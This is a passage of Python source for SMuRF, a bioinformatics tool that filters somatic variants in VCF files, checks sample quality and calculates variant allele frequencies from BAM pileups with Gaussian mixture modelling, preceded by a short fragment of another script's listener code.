    listener_process = Process(target=run_listener)
    try:
        listener_process.start()
    except KeyboardInterrupt:
        listener_process.terminate()
        print("Stopped by User")
    print("Wait for notification...")


if __name__ == '__main__':
    main()
SMuRF.py | #!/usr/bin/python
# Import modules
import vcf as pyvcf
import pysam
import argparse
import multiprocessing as mp
import queue
import time
import sys
import collections
import subprocess
import os
import glob
import pandas as pd
#import matplotlib.pyplot as plt
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as plt
import numpy as np
import re
from sklearn.mixture import GaussianMixture
from matplotlib.backends.backend_pdf import PdfPages
import warnings
import configparser
# Get version from git
#__version__ = subprocess.check_output(["git", "describe"]).strip().decode('UTF-8')
__version__ = 'v2.1.2'

# Set arguments (single parser — the original built a throwaway parser first).
parser = argparse.ArgumentParser(description='Put here a description.')
parser.add_argument('-i', '--input', type=str, help='Input indexed vcf.gz file', required=True)
parser.add_argument('-b', '--bam', action='append', nargs="*", type=str, help='Input bam file', required=True)
parser.add_argument('-n', '--normal', action='append', type=str, help='Normal sample name')
parser.add_argument('-c','--config', default=os.path.dirname(os.path.abspath(__file__))+"/config.ini",type=str,help='Give the full path to your own ini file (default: %(default)s)')
parser.add_argument('-v', '--version', action='version', version=__version__)
args = parser.parse_args()

# Flatten input list of bam files (append + nargs="*" yields a list of lists)
args.bam = [x for l in args.bam for x in l]

# Set default control None if no control is given at the command line
if not args.normal:
    args.normal = [ None ]

cfg = configparser.ConfigParser()
if not os.path.exists(args.config):
    sys.stderr.write("Config file "+args.config+" does not exists\n")
    sys.exit()
# Layer a user-supplied config on top of the bundled defaults.
if not args.config == os.path.dirname(os.path.abspath(__file__))+"/config.ini":
    cfg.read([os.path.dirname(os.path.abspath(__file__))+"/config.ini", args.config])
else:
    cfg.read(args.config)
# Persist the effective configuration for reproducibility.
with open('SMuRF_config.ini', 'w') as configfile:
    cfg.write(configfile)

# Read the vcf, fix and add fields to the header
vcf_reader = pyvcf.Reader(filename=args.input, encoding='utf-8')
vcf_name = os.path.basename(args.input)
vcf_name = vcf_name.replace(".vcf.gz","")

# Create tmp directory if it does not exist (replaces the
# try/os.stat/bare-except idiom, which swallowed unrelated errors).
os.makedirs('./SMuRF_tmp', exist_ok=True)

# Define global variables
vaf_dict = collections.defaultdict(list)
responsibilities_dict = collections.defaultdict(dict)
contig_list = []
bam_sample_names = collections.defaultdict(dict)
def main():
    """Orchestrate per-contig VCF parsing across a pool of worker processes
    and collect their per-sample VAF lists into the global vaf_dict."""
    # NOTE(review): vaf_df is declared global but never assigned here —
    # presumably used elsewhere in the file; confirm before removing.
    global vcf_reader, vaf_df, blacklist
    vcf_reader = fix_vcf_header(vcf_reader)
    vcf_reader = add_vcf_header(vcf_reader)
    blacklist = create_blacklist()
    for contig in vcf_reader.contigs:
        contig_list.append(contig)
    # Create an input queue with the contigs and an empty output queue
    q = mp.Queue()
    q_out = mp.Queue()
    for contig in contig_list:
        q.put(contig)
    # Create number of processes to parse the vcf file
    processes = [mp.Process(target=parse_chr_vcf, args=(q, q_out, vcf_reader, args.bam)) for x in range(int(cfg['SMuRF']['threads']))]
    for p in processes:
        p.start()
    # Drain q_out while workers run: results must be consumed continuously,
    # otherwise workers can block on a full pipe and never exit.
    liveprocs = list(processes)
    while liveprocs:
        time.sleep(5)
        try:
            while 1:
                # Pull every result currently available; each item is a
                # dict of sample -> list of VAF values.
                for s,v in q_out.get(block=False, timeout=1).items():
                    vaf_dict[s].extend(v)
        except queue.Empty:
            pass
        # Give tasks a chance to put more data in
        time.sleep(10)
        if not q.empty():
            continue
        # Only re-evaluate liveness once the input queue has emptied.
        liveprocs = [p for p in liveprocs if p.is_alive()]
    for p in processes:
        p.join()
def parse_chr_vcf(q, q_out, contig_vcf_reader, bams):
    """
    Function to parse the vcf per contig (runs in a worker process).
    Write the new record to a vcf file.
    Input: Queue object (contigs to process)
    Input: Queue out object (per-sample VAF results)
    Input: VCF reader object
    Input: List with the bam names
    """
    while True:
        try:
            # Get contig one by one from the queue
            contig = q.get(block=False,timeout=1)
            contig_vaf = collections.defaultdict(list)
            # One flagged output VCF per contig under ./SMuRF_tmp.
            contig_vcf_flag_writer = pyvcf.Writer(open('./SMuRF_tmp/{}_SMuRF.vcf'.format(contig),'w', encoding='utf-8'), contig_vcf_reader)
            try:
                # Try to parse the specific contig from the vcf
                contig_vcf_reader.fetch(contig)
            except:
                # Skip contig if it is not present in the vcf file
                # NOTE(review): bare except also hides e.g. missing index errors.
                continue
            # print( "blacklist", blacklist )
            for record in contig_vcf_reader.fetch(contig):
                if not record.FILTER:
                    # Normalize the contig name for blacklist lookup
                    # ("chr1"/"chrom1" -> "1").
                    chr = record.CHROM
                    chr = chr.lower()
                    chr = re.sub("chr|chrom", "", chr)
                    # if (len(record.ALT[0]) > 1):
                    #     check_flanking_indels(record, contig_vcf_reader)
                    # Filter cascade: first matching condition sets the flag.
                    if "MQ" not in record.INFO:
                        record.FILTER.append("NoMQtag")
                    elif record.ID and "COSM" not in record.ID:
                        record.FILTER.append('KnownVariant')
                    elif record.QUAL < int(cfg['SMuRF']['qual']):
                        record.FILTER.append('BadQual')
                    elif len(record.ALT) > 1:
                        record.FILTER.append('MultiAllelic')
                    elif record.INFO['MQ'] < int(cfg['SMuRF']['mq']):
                        record.FILTER.append('BadMQ')
                    elif chr in blacklist and record.POS in blacklist[chr]:
                        record.FILTER.append("BlackList")
                    # NOTE(review): cfg values are strings, so
                    # `not cfg['SMuRF']['indel']` is only True for an empty
                    # value — "0"/"False" are truthy. Confirm intended config use.
                    elif (len(record.ALT[0]) > 1 or len(record.REF) > 1) and not cfg['SMuRF']['indel']:
                        record.FILTER.append("Indel")
                    elif sample_quality_control( record ):
                        for s,v in calculate_vaf( record ).items():
                            # Keep VAFs only for records that survived filtering
                            # (NoClonalSample alone is tolerated).
                            if ( not record.FILTER or record.FILTER == ['NoClonalSample'] ):
                                contig_vaf[s].append(v)
                contig_vcf_flag_writer.write_record(record)
            q_out.put( contig_vaf )
        # Break the loop if the queue is empty
        except queue.Empty:
            break
def check_flanking_indels(record, contig_vcf_reader):
    """Flag *record* when a control sample carries an indel within the
    configured flanking window around the record's position.

    Appends 'FlankingControlEvidence' to record.FILTER on the first hit.
    Always returns 1.
    """
    flank = int(cfg['SMuRF']['indel_flank'])
    variant_genotypes = ('0/1', '1/1', '0|1', '1|1')
    for nearby in contig_vcf_reader.fetch(record.CHROM, record.POS - flank, record.POS + flank):
        # Only indel records in the window are of interest.
        if not (len(nearby.ALT[0]) > 1):
            continue
        # Skip the record under inspection itself.
        if nearby.CHROM == record.CHROM and nearby.POS == record.POS:
            continue
        for call in nearby.samples:
            is_control = call.sample in args.normal
            if is_control and call['GT'] in variant_genotypes:
                record.FILTER.append("FlankingControlEvidence")
                return( 1 )
    return( 1 )
def get_command_line():
    """
    Function to get the commandline arguments.
    Return: A string with the actual command, wrapped in double quotes.
    """
    cmdline = [sys.argv[0]]
    for arg in vars(args):
        value = getattr(args, arg)
        # isinstance instead of `type(...) is list` (idiomatic type check);
        # list-valued arguments (e.g. repeated --bam) repeat the flag.
        if isinstance(value, list):
            for item in value:
                cmdline.append('--{} {}'.format(arg, str(item)))
        else:
            cmdline.append('--{} {}'.format(arg, str(value)))
    return( '"{}"'.format(" ".join(cmdline)) )
def fix_vcf_header( vcf_reader ):
    """
    Function to fix fields in the vcf header.
    Re-declares dbNSFP INFO fields whose declared type does not always match
    the data, so the parser does not choke on mixed values.
    Input: A vcf reader object
    Return: The vcf reader object with fixed headers
    """
    #dbNSFP_clinvar_clnsig has a Integer type but sometimes it is a String, e.g. 2|2
    vcf_reader.infos['dbNSFP_clinvar_clnsig'] = pyvcf.parser._Info("dbNSFP_clinvar_clnsig",1,"String","Field 'clinvar_clnsig' from dbNSFP", None, None)
    #dbNSFP_clinvar_golden_stars has a Integer type but sometimes it is a String, e.g. 0|1
    vcf_reader.infos['dbNSFP_clinvar_golden_stars'] = pyvcf.parser._Info("dbNSFP_clinvar_golden_stars",1,"String","Field 'clinvar_golden_stars' from dbNSFP", None, None)
    # hg18/hg19 contig fields are likewise forced to String.
    vcf_reader.infos['dbNSFP_hg18_chr'] = pyvcf.parser._Info("dbNSFP_hg18_chr",1,"String","Field 'hg18_chr' from dbNSFP", None, None)
    vcf_reader.infos['dbNSFP_hg19_chr'] = pyvcf.parser._Info("dbNSFP_hg19_chr",1,"String","Field 'hg19_chr' from dbNSFP", None, None)
    return( vcf_reader )
def add_vcf_header( vcf_reader ):
    """
    Function to add a new field to the vcf header.
    Declares all SMuRF-specific metadata, FORMAT, FILTER and INFO fields so
    records carrying them can be written out.
    Input: A vcf reader object
    Return: The vcf reader object with new headers added
    """
    # Metadata
    vcf_reader.metadata['SMuRFCmd'] = [get_command_line()]
    # Formats
    vcf_reader.formats['VAF'] = pyvcf.parser._Format('VAF',None,'Float','Variant Allele Frequency calculated from the BAM file')
    vcf_reader.formats['CAD'] = pyvcf.parser._Format('CAD',None,'Integer','Calculated Allelic Depth, used for VAF calculation')
    vcf_reader.formats['FT'] = pyvcf.parser._Format('FT',None,'String','Sample filter')
    # Filters (record-level)
    vcf_reader.filters['KnownVariant'] = pyvcf.parser._Filter('KnownVariant','Variant has already an ID, excluding COSMIC_IDs')
    vcf_reader.filters['BadMQ'] = pyvcf.parser._Filter('BadMQ', 'Variant with MQ <'+str(cfg['SMuRF']['mq']))
    vcf_reader.filters['BadQual'] = pyvcf.parser._Filter('BadQual','Variant with a QUAL <'+str(cfg['SMuRF']['qual']))
    vcf_reader.filters['MultiAllelic'] = pyvcf.parser._Filter('MultiAllelic', 'Variant has multiple alternative alleles')
    vcf_reader.filters['BlackList'] = pyvcf.parser._Filter('BlackList', 'Variant exists in a blacklist')
    vcf_reader.filters['Indel'] = pyvcf.parser._Filter('Indel','Variant is an indel')
    vcf_reader.filters['ControlEvidence'] = pyvcf.parser._Filter('ControlEvidence','Variant is also found in a control based on the GT')
    vcf_reader.filters['NoSampleEvidence'] = pyvcf.parser._Filter('NoSampleEvidence','Variant is not found in any of the samples based on the GT')
    vcf_reader.filters['AllSamplesFailedQC'] = pyvcf.parser._Filter('AllSamplesFailedQC', 'All samples failed the quality control')
    vcf_reader.filters['AllControlsFailedQC'] = pyvcf.parser._Filter('AllControlsFailedQC', 'All controls failed the quality control')
    vcf_reader.filters['ControlSubclonal'] = pyvcf.parser._Filter('ControlSubclonal', 'Variant is found as subclonal in a control based on the recalculated VAF')
    vcf_reader.filters['ControlClonal'] = pyvcf.parser._Filter('ControlClonal', 'Variant is found as clonal in a control based on the recalculated VAF')
    vcf_reader.filters['NoClonalSample'] = pyvcf.parser._Filter('NoClonalSample', 'Variant is not found as clonal in any of the samples based on the recalculated VAF')
    # Sample filters (per-sample FT values)
    vcf_reader.filters['LowCov'] = pyvcf.parser._Filter('LowCov', 'Variant has a coverage <'+str(cfg['SMuRF']['coverage'])+' in this sample/control')
    vcf_reader.filters['NoGenoType'] = pyvcf.parser._Filter('NoGenoType', 'Genotype is empty for this sample/control')
    vcf_reader.filters['isRef'] = pyvcf.parser._Filter('isRef', 'Genotype is a reference (i.e. reference 0/0)')
    vcf_reader.filters['isVariant'] = pyvcf.parser._Filter('isVariant', 'Genotype is a variant (i.e. not reference 0/0)')
    vcf_reader.filters['LowGQ'] = pyvcf.parser._Filter('LowGQ', 'Variant has a low genome quality for this sample/control')
    # Infos (counts and name lists for samples/controls per clonality class)
    vcf_reader.infos['ABSENT_SAMPLES'] = pyvcf.parser._Info('ABSENT_SAMPLES',1,'Integer','Number of samples without the variant', None, None)
    vcf_reader.infos['SUBCLONAL_SAMPLES'] = pyvcf.parser._Info('SUBCLONAL_SAMPLES',1,'Integer','Number of samples with a subclonal variant', None, None)
    vcf_reader.infos['CLONAL_SAMPLES'] = pyvcf.parser._Info('CLONAL_SAMPLES',1,'Integer','Number of samples with a clonal variant', None, None)
    vcf_reader.infos['ABSENT_CONTROLS'] = pyvcf.parser._Info('ABSENT_CONTROLS',1,'Integer','Number of controls without the variant', None, None)
    vcf_reader.infos['SUBCLONAL_CONTROLS'] = pyvcf.parser._Info('SUBCLONAL_CONTROLS',1,'Integer','Number of controls with a subclonal variant', None, None)
    vcf_reader.infos['CLONAL_CONTROLS'] = pyvcf.parser._Info('CLONAL_CONTROLS',1,'Integer','Number of controls with a clonal variant', None, None)
    vcf_reader.infos['ABSENT_SAMPLE_NAMES'] = pyvcf.parser._Info('ABSENT_SAMPLE_NAMES',None,'String','Samples without the variant', None, None)
    vcf_reader.infos['SUBCLONAL_SAMPLE_NAMES'] = pyvcf.parser._Info('SUBCLONAL_SAMPLE_NAMES',None,'String','Samples with a subclonal variant', None, None)
    vcf_reader.infos['CLONAL_SAMPLE_NAMES'] = pyvcf.parser._Info('CLONAL_SAMPLE_NAMES',None,'String','Samples with a clonal variant', None, None)
    vcf_reader.infos['ABSENT_CONTROL_NAMES'] = pyvcf.parser._Info('ABSENT_CONTROL_NAMES',None,'String','Controls without the variant', None, None)
    vcf_reader.infos['SUBCLONAL_CONTROL_NAMES'] = pyvcf.parser._Info('SUBCLONAL_CONTROL_NAMES',None,'String','Controls with a subclonal variant', None, None)
    vcf_reader.infos['CLONAL_CONTROL_NAMES'] = pyvcf.parser._Info('CLONAL_CONTROL_NAMES',None,'String','Controls with a clonal variant', None, None)
    vcf_reader.infos['PASS_QC_SAMPLES'] = pyvcf.parser._Info('PASS_QC_SAMPLES',1,'Integer','Number of samples which pass all quality control filters', None, None)
    vcf_reader.infos['PASS_QC_CONTROLS'] = pyvcf.parser._Info('PASS_QC_CONTROLS',1,'Integer','Number of controls which pass all quality control filters', None, None)
    vcf_reader.infos['FAIL_QC_SAMPLES'] = pyvcf.parser._Info('FAIL_QC_SAMPLES',1,'Integer','Number of samples which failed one or multiple quality control filters', None, None)
    vcf_reader.infos['FAIL_QC_CONTROLS'] = pyvcf.parser._Info('FAIL_QC_CONTROLS',1,'Integer','Number of controls which failed one or multiple quality control filters', None, None)
    vcf_reader.infos['PASS_QC_SAMPLE_NAMES'] = pyvcf.parser._Info('PASS_QC_SAMPLE_NAMES',None,'String','Samples which pass all quality control filters', None, None)
    vcf_reader.infos['PASS_QC_CONTROL_NAMES'] = pyvcf.parser._Info('PASS_QC_CONTROL_NAMES',None,'String','Controls which pass all quality control filters', None, None)
    vcf_reader.infos['FAIL_QC_SAMPLE_NAMES'] = pyvcf.parser._Info('FAIL_QC_SAMPLE_NAMES',None,'String','Samples which failed one or multiple quality control filters', None, None)
    vcf_reader.infos['FAIL_QC_CONTROL_NAMES'] = pyvcf.parser._Info('FAIL_QC_CONTROL_NAMES',None,'String','Controls which failed one or multiple quality control filters', None, None)
    return( vcf_reader )
def get_sample_name( bamfile ):
    """
    Function to get the sample name from the bam file.
    Input: An AlignmentFile object of the bam file
    Return: The sample name, or False if there is no RG/SM tag in the bam header
    """
    header = bamfile.header
    sample_name = False
    if 'RG' in header:
        # The RG entry may be a single mapping or a list of read groups;
        # take the SM tag of the first read group.
        # (isinstance instead of `type(...) is list` — idiomatic type check.)
        if isinstance(header['RG'], list):
            sample_name = header['RG'][0]['SM']
        else:
            sample_name = header['RG']['SM']
    return( sample_name )
def check_pileupread( pileupread ):
    """
    Function to check a pileup read.
    Returns True if the read needs to be kept and returns False if read can be skipped.
    Input: Pileupread object
    Return: True or False
    """
    check = True
    if pileupread.alignment.is_duplicate:
        check = False
    elif pileupread.is_del:
        check = False
    elif pileupread.is_refskip:
        check = False
    # BUGFIX: query_position == 0 is a valid position (first base of the read);
    # the old `not pileupread.query_position` wrongly discarded such reads.
    # pysam sets query_position to None for del/refskip positions only.
    elif pileupread.query_position is None:
        check = False
    elif pileupread.alignment.mapq < int(cfg['SMuRF']['mapq']):
        check = False
    elif pileupread.alignment.query_qualities[pileupread.query_position] < int(cfg['SMuRF']['base_phred_quality']):
        check = False
    return( check )
def update_call_data( call, edit_keys, edit_values, vcf_reader ):
    """
    Function to add or update a field in the FORMAT data of a call.
    The change is applied in place on the call object.
    Input: A call object
    Input: A list with format fields to set
    Input: A list with format values (parallel to edit_keys)
    Input: A vcf reader object (supplies the full set of declared FORMAT keys)
    """
    f_keys = list(vcf_reader.formats.keys())
    d = dict(call.data._asdict())
    f_vals = []
    for key in f_keys:
        if key in edit_keys:
            # Caller-supplied value wins.
            f_vals.append(edit_values[edit_keys.index(key)] )
        elif key in d:
            # Keep the value already present on the call.
            f_vals.append(d[key] )
        else:
            # Declared in the header but absent on this call.
            f_vals.append(None)
    handy_dict = dict(zip(f_keys, f_vals))
    # GT must be the first FORMAT key per the VCF specification.
    f_keys.remove('GT')
    f_keys.insert(0,'GT')
    # Rebuild the CallData namedtuple with the new key order/values.
    call.data = collections.namedtuple('CallData',f_keys)(**handy_dict)
def gmm( X ):
    """
    Function to fit a GMM model and select the best number of components.
    Input: Array with VAF values
    Return: x values (grid on (0, 1])
    Return: List with probability values for all components combined
    Return: List with probability values of each component
    Return: List of the means of each component
    Return: List of standard deviations of each component
    Return: Per-x responsibilities, columns sorted by component mean
    """
    X = np.array(X)
    X = np.reshape(X, [len(X), 1])
    # ------------------------------------------------------------
    # Learn the best-fit GMM models
    # Here we'll use GMM in the standard way: the fit() method
    # uses an Expectation-Maximization approach to find the best
    # mixture of Gaussians for the data
    # fit models with min_components..max_components-1 components
    N = np.arange(int(cfg['SMuRF']['min_components']), int(cfg['SMuRF']['max_components']))
    models = [None for i in range(len(N))]
    for i in range(len(N)):
        models[i] = GaussianMixture(N[i]).fit(X)
    # compute the AIC and the BIC
    # NOTE(review): BIC is computed but only AIC is used for model selection.
    AIC = [m.aic(X) for m in models]
    BIC = [m.bic(X) for m in models]
    # Evaluation grid over the VAF domain.
    x = np.linspace(0.01, 1, 100)
    x = x.reshape([len(x), 1])
    # Pick the model with the lowest AIC.
    M_best = models[np.argmin(AIC)]
    means = M_best.means_
    N = M_best.n_components
    # Per-component standard deviation from the covariance trace.
    std_devs = [ np.sqrt( np.trace(M_best.covariances_[i])/N) for i in range(0,N) ]
    logprob = M_best.score_samples(x)
    responsibilities = M_best.predict_proba(x)
    p = np.exp(logprob)
    # Split the total density into the per-component contributions.
    p_individual = responsibilities * p[:, np.newaxis]
    r = responsibilities
    # Reorder responsibility columns by increasing component mean.
    r = r[:, np.argsort([u for m in means for u in m]) ]
    return( x, p, p_individual, means, std_devs, r )
def solve(m1, m2, std1, std2):
    """
    Find the points where two Gaussian densities intersect.

    Equating the two normal pdfs and taking logs yields a quadratic in x;
    its roots are the intersection points.
    Input: Mean of one distribution
    Input: Mean of another distribution
    Input: Standard deviation of the first distribution
    Input: Standard deviation of the second distribution
    Return: Intersection points (array of quadratic roots)
    """
    var1 = std1 ** 2
    var2 = std2 ** 2
    quad_coeff = 1 / (2 * var1) - 1 / (2 * var2)
    lin_coeff = m2 / var2 - m1 / var1
    const_coeff = m1 ** 2 / (2 * var1) - m2 ** 2 / (2 * var2) - np.log(std2 / std1)
    return np.roots([quad_coeff, lin_coeff, const_coeff])
def create_vaf_plot():
    """
    Function to plot the VAF values.
    For every sample in the global vaf_dict: fit a GMM, record per-x
    responsibilities into responsibilities_dict, and draw a histogram plus
    the fitted densities into one page of a multipage PDF.
    """
    # Open a multipage pdf file
    with PdfPages(vcf_name+'_SMuRF_VAFplot.pdf') as pdf:
        for sample in vaf_dict:
            plt.figure(figsize=(30,10))
            x, p, p_individual, means, std_devs, respons = gmm( vaf_dict[sample] )
            # Stash responsibilities keyed by the VAF value formatted to 2 decimals.
            for idx in range(0,len(x)):
                x_vaf = '{0:.2f}'.format(x[idx][0])
                responsibilities_dict[sample][x_vaf] = respons[idx].tolist()
            # Left panel: raw VAF histogram.
            ax0 = plt.subplot(1,2,1)
            ax0.hist(vaf_dict[sample],bins=50)
            # Right panel: fitted mixture densities.
            ax1 = plt.subplot(1,2,2)
            ax1.plot(x, p_individual, '--k', color='lightgray',linewidth=0.5)
            ax1.plot(x, p, '-k')
            # Reference lines at VAF 0.5 (clonal het) and 0.3.
            ax1.axvline(x=0.5)
            ax1.axvline(x=0.3)
            mu = []
            # Calculate the intersection points between the distributions
            # NOTE(review): uses only the first two components — assumes the
            # GMM fit returned at least two; confirm against min_components.
            result = solve(means[0],means[1], std_devs[0], std_devs[1])
            for r in result:
                if r > 0.0 and r <= 1.0:
                    # ax1.axvline(x=r,linestyle='dashed',color='lightgray',linewidth=0.5)
                    means = np.append(means,r)
            # Plot lines at the mean of each distribution
            for m in means:
                mu.append(str(("{0:.2f}".format(float(m)))))
                ax1.axvline(x=m,linestyle='dashed',color='lightgray',linewidth=0.5)
            # Plot formatting
            plt.title(sample)
            # plt.xlabel('VAF')
            plt.ylabel('p(VAF)')
            # Set second x axis for the means of each component
            ax2 = ax1.twiny()
            ax2.xaxis.set_tick_params(length=15)
            ax2.set_xticks(means)
            ax2.set_xticklabels(mu)
            ax2.xaxis.set_ticks_position('bottom')
            ax2.xaxis.set_label_position('bottom')
            ax2.set_xlim(ax1.get_xlim())
            pdf.savefig()
            plt.close()
def sample_quality_control( record ):
    """
    Function to check if the sample pass the quality control.

    Assigns a per-call QC label (PASS / LowGQ / LowCov / NoGenoType /
    isVariant) into the call's FT field, using GQ thresholds from the
    module-level cfg that differ for indels vs SNVs and for samples vs
    controls (controls = names listed in args.normal). Then flags the
    record-level FILTER and fills PASS/FAIL INFO counters.

    Input: VCF record object
    Return: True or False — False if all samples or controls failed QC,
            if a control carries the variant, or if no sample carries it.
    """
    # qc[True] holds sample results, qc[False] holds control results
    qc = collections.defaultdict(dict)
    noSampleEvidence = 0
    controlEvidence = False
    indel = False
    check = True
    # Check if variant is an indel
    if (len(record.REF) > 1 or len(record.ALT[0]) > 1):
        indel = True
    for call in (record.samples):
        sample = True
        # Reset FT before re-evaluating this call
        update_call_data(call, ['FT'], [None], vcf_reader)
        # Check is the sample is in the control list
        if call.sample in args.normal:
            sample = False
        # QC fails if there is no genotype
        if call['GT'] == './.' or call['GT'] == '.|.':
            qc[sample][call.sample] = 'NoGenoType'
        # QC fails if the coverage is too low
        elif (call['DP'] == None or call['DP'] < int(cfg['SMuRF']['coverage'])):
            qc[sample][call.sample] = 'LowCov'
        elif sample:
            # If sample is homozygous reference
            if call['GT'] == '0/0' or call['GT'] == '0|0':
                noSampleEvidence += 1
                if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homref'])):
                    qc[sample][call.sample] = 'LowGQ'
                elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['sample_gq_homref'])):
                    qc[sample][call.sample] = 'LowGQ'
                else:
                    qc[sample][call.sample] = 'PASS'
            # Check QC for homozygous variant
            elif call['GT'] == '1/1' or call['GT'] == '1|1':
                if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['sample_gq_homozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                else:
                    qc[sample][call.sample] = 'PASS'
            # Check QC for heterozygous variant
            elif call['GT'] == '0/1' or call['GT'] == '0|1':
                if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_heterozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['sample_gq_heterozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                else:
                    qc[sample][call.sample] = 'PASS'
        else:
            # If variant is also found in a control
            if call['GT'] == '0/1' or call['GT'] == '0|1':
                controlEvidence = True
                if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_heterozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['control_gq_heterozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                else:
                    qc[sample][call.sample] = 'isVariant'
            elif call['GT'] == '1/1' or call['GT'] == '1|1':
                controlEvidence = True
                if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['control_gq_homozygous'])):
                    qc[sample][call.sample] = 'LowGQ'
                else:
                    qc[sample][call.sample] = 'isVariant'
            elif call['GT'] == '0/0' or call['GT'] == '0|0':
                if indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['indel_gq_homref'])):
                    qc[sample][call.sample] = 'LowGQ'
                elif not indel and (not call['GQ'] or call['GQ'] < int(cfg['SMuRF']['control_gq_homref'])):
                    qc[sample][call.sample] = 'LowGQ'
                else:
                    qc[sample][call.sample] = 'PASS'
        # Write the QC verdict into this call's FT field
        if call.sample in qc[sample]:
            update_call_data(call,['FT'],[qc[sample][call.sample]], vcf_reader)
    # Keep GT first in the FORMAT column (required by the VCF convention)
    format_list = list(vcf_reader.formats.keys())
    format_list.remove('GT')
    format_list.insert(0,'GT')
    # Add VAF information to the format field of each sample
    record.FORMAT = ":".join(format_list)
    # Flag variant if it is found in one of the controls
    if controlEvidence:
        record.FILTER.append('ControlEvidence')
        check = False
    # Flag variant if it is not found in one of the samples
    elif len(qc[True]) == noSampleEvidence :
        record.FILTER.append('NoSampleEvidence')
        check = False
    elif len(qc[False].keys()) > 0 and list(qc[False].values()).count('PASS') == 0:
        record.FILTER.append('AllControlsFailedQC')
        check = False
    elif list(qc[True].values()).count('PASS') == 0:
        record.FILTER.append('AllSamplesFailedQC')
        check = False
    else:
        # Record pass/fail counts and names in the INFO field
        record.INFO['PASS_QC_SAMPLES'] = list(qc[True].values()).count('PASS')
        record.INFO['FAIL_QC_SAMPLES'] = len(qc[True])-list(qc[True].values()).count('PASS')
        record.INFO['PASS_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) == 'PASS')[0])])
        record.INFO['FAIL_QC_SAMPLE_NAMES'] = list(np.array(list(qc[True].keys()))[list(np.where(np.array(list(qc[True].values())) != 'PASS')[0])])
        if ( len(qc[False].keys()) > 0 ):
            record.INFO['PASS_QC_CONTROLS'] = list(qc[False].values()).count('PASS')
            record.INFO['FAIL_QC_CONTROLS'] = len(qc[False])- list(qc[False].values()).count('PASS')
            record.INFO['PASS_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) == 'PASS')[0])])
            record.INFO['FAIL_QC_CONTROL_NAMES'] = list(np.array(list(qc[False].keys()))[list(np.where(np.array(list(qc[False].values())) != 'PASS')[0])])
    return( check )
def calculate_vaf( record ):
    """
    Function to calculate the VAF in the bam files.

    For every BAM in args.bam, pile up reads at the record position, count
    reference (dr), variant (dv) and other-indel (dx) reads, compute
    VAF = dv / (dv + dr) rounded to 2 decimals, and write VAF/CAD/FT into
    the matching sample's FORMAT fields. Also classifies each sample as
    ABSENT / SUBCLONAL / CLONAL using cfg thresholds and fills the
    corresponding INFO fields and FILTER flags.

    Input: VCF record object
    Return: dict {sample_name: vaf} for non-control samples above the
            absent threshold
    """
    record_vaf = {}
    # vaf_info[True] = samples, vaf_info[False] = controls
    vaf_info = collections.defaultdict(lambda: collections.defaultdict(list))
    qc = collections.defaultdict(dict)
    sample = "UNKNOWN"
    for call in (record.samples):
        # Add empty VAF and CAD tag to the record
        update_call_data(call, ['VAF','CAD'], [None, None], vcf_reader)
    for bam in args.bam:
        # NOTE(review): F is never closed; each call leaks one open
        # AlignmentFile per BAM — consider closing after the pileup.
        F=pysam.AlignmentFile(bam,'rb')
        # Cache the BAM's sample name across calls
        if bam not in bam_sample_names:
            sample_name = get_sample_name(F)
            bam_sample_names[bam] = sample_name
        else:
            sample_name = bam_sample_names[bam]
        dv = 0    # reads supporting the variant
        dr = 0    # reads supporting the reference
        dx = 0    # reads with a different indel than the called one
        vaf = 0.0
        # Loop through each reads that is overlapping the position of the variant
        for pileupcolumn in F.pileup(record.CHROM, int(record.POS)-1, int(record.POS), truncate=True, stepper='nofilter',min_base_quality=int(cfg['SMuRF']['base_phred_quality'])):
            for pileupread in pileupcolumn.pileups:
                # QC the read
                if ( check_pileupread( pileupread) ):
                    alt = record.ALT[0]
                    # If variant is a SNV
                    if (len(record.REF) == 1 and len(alt) == 1):
                        # Read has the reference
                        if pileupread.alignment.query_sequence[pileupread.query_position] == record.REF:
                            dr+=1
                        # Read has the variant
                        elif pileupread.alignment.query_sequence[pileupread.query_position] == alt:
                            dv+=1
                    # If variant is deletion
                    elif (len(record.REF) > 1 and len(alt) == 1):
                        # Read has the deletion (pysam reports deletions as negative indel)
                        if ( pileupread.indel*-1 == len(record.REF)-1 ):
                            dv+=1
                        # Read has no deletion
                        elif pileupread.indel == 0:
                            dr+=1
                        else:
                            dx+=1
                    # If variant is an insertion
                    elif ( len(record.REF) == 1 and len(alt) > 1 ):
                        # Read has the insertion
                        if ( pileupread.indel == len(alt)-1 ):
                            dv+=1
                        # Read has no insertion
                        elif pileupread.indel == 0:
                            dr+=1
                        else:
                            dx+=1
                    # If variant is an INDEL
                    else:
                        # Read has the INDEL
                        if ( pileupread.indel == (len(alt)-len(record.REF)) ):
                            dv+=1
                        # Read has no INDEL
                        elif pileupread.indel == 0:
                            dr+=1
                        else:
                            dx+=1
        # Calculate the VAF; skip this BAM entirely when no informative reads
        try:
            vaf = float("{0:.2f}".format(dv/float(dv+dr)))
        except ZeroDivisionError:
            continue
        # Loop through each sample in the vcf file
        for call in (record.samples):
            sample = True
            if call.sample in args.normal:
                sample = False
            # Check if the sample name in the vcf file is the same as a sample name in the bam file
            if call.sample == sample_name:
                # Add the VAF and sample name to the output tuple
